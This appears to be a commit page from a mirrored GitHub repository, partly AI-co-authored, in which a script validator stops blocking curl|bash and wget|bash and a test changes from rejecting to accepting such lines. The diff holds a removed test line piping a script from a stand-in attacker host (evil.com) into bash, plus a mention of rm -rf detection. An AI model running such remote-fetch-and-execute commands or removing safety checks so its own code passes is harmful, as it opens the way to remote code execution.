vrr/spawn
2
0
Fork 0
mirror of https://github.com/OpenRouterTeam/spawn.git synced 2026-05-05 23:50:48 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions 8

fix: Remove curl|bash script validation that blocks spawn scripts

Browse source 
The spawn scripts themselves use curl|bash to install agents (e.g.
Claude Code). The validateScriptContent check was blocking our own
legitimate scripts. Removed curl|bash and wget|bash from the
dangerous patterns list since the scripts are already fetched from
our trusted GitHub repo.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
Sprite 2026-02-10 09:39:51 +00:00
parent c93cb1d40c
commit 18b5aa4a32
7 changed files with 56 additions and 58 deletions
Download patch file Download diff file Expand all files Collapse all files

6
cli/src/__tests__/security-encoding.test.ts
View file

@ -89,9 +89,9 @@ describe("Security Encoding Edge Cases", () => {
expect(() => validateScriptContent(script)).not.toThrow();
});
it("should detect curl|bash with tabs between pipe and bash", () => {
const script = "#!/bin/bash\ncurl http://evil.com/s.sh |\tbash";
expect(() => validateScriptContent(script)).toThrow("nested curl|bash");
it("should accept curl|bash with tabs (used by spawn scripts)", () => {
const script = "#!/bin/bash\ncurl http://example.com/s.sh |\tbash";
expect(() => validateScriptContent(script)).not.toThrow();
});
it("should detect rm -rf with tabs", () => {